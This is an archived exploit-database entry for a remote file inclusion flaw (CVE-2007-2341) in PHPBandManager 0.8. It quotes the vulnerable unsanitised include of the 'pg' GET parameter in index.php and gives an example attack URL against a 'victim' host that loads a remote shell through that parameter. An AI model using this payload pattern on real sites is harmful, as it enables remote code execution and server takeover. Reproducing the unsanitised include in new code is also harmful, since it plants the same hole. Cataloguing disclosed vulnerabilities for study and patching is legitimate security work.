PHPBandManager 0.8 - 'index.php?pg' Remote File Inclusion

Author: koray
type: webapps
platform: php
port: 
date_added: 2007-04-25 
date_updated: 2016-09-30 
verified: 1 
codes: OSVDB-35606;CVE-2007-2341 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpBandManager-0.8.zip

author:koray
greetz:cigicigi.net
script:http://sourceforge.net/projects/phpbandmanager

allow_url_fopen:on or register_globals:on

vuln;

/bandmanager/suite/index.php

include($_GET['pg'].".php");

example;

http://www.victim.com/suite/index.php?pg=shell link?

# milw0rm.com [2007-04-26]